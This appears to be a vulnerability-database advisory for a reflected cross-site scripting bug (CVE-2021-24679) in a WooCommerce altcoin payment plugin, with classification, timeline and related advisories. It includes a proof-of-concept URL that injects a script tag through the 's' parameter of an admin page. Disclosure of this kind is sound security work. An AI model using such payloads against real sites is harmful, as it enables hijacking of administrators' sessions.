WordPress Plugin Vulnerabilities

Bitcoin / AltCoin Payment Gateway for WooCommerce < 1.6.1 - Reflected Cross-Site Scripting

Description

The plugin does not escape the 's' GET parameter before outputting back in the All Masking Rules page, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php?page=cs-woo-altcoin-all-coins&s="><script>alert(/XSS/)</script>

Affects Plugins

Plugin icon
woo-altcoin-payment-gateway
Fixed in 1.6.1

References

CVE
CVE-2021-24679

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
7c6c0aac-1733-4abc-8e95-05416636a127

Timeline

Publicly Published
2021-09-06 (about 2 years ago)
Added
2021-09-06 (about 2 years ago)
Last Updated
2023-01-29 (about 1 years ago)

Other

Published
Title
Published
2023-11-08
Title
Basic Interactive World Map < 2.7 - Admin+ Stored XSS
Published
2024-03-25
Title
WP Fast Total Search < 1.60.213 - Authenticated (Contributor+) Stored Cross-Site Scripting via WPFTS Live Search Widget
Published
2023-01-18
Title
Lightbox Gallery < 0.9.5 - Contributor+ Stored XSS via Shortcode
Published
2024-03-19
Title
Gum Elementor Addon < 1.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Post Meta Widget
Published
2014-11-10
Title
Shareaholic 7.6.0.3 - XSS